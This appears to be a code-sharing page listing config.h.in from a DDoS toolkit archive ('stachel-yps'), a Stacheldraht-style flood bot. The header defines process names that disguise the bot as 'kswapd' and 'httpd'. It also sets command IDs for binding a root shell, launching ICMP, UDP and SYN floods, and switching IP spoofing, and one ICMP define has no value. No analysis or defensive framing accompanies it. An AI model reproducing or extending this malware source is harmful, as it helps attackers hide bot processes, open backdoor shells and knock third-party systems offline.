config.h.in
来自「攻防自卫 ddos stachel-yps.tar.gz」· IN 代码 · 共 23 行
IN
23 行
#ifndef _CONFIG_H/* user defined values for the teletubby flood network */#define HIDEME "(kswapd)"#define HIDEKIDS "httpd"#define CHILDS 10/* These are like passwords, you might want to change them */#define ID_SHELL 1 /* to bind a rootshell */#define ID_ICMP /* to icmp flood */#define ID_SENDUDP 9002 /* to udp flood */#define ID_SENDSYN 9003 /* to syn flood */#define ID_SYNPORT 9004 /* to set port */#define ID_STOPIT 9005 /* to stop flooding */#define ID_SWITCH 9006 /* to switch spoofing mode */#define ID_ACK 9007 /* for replies to the client */#define _CONFIG_H#endif
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?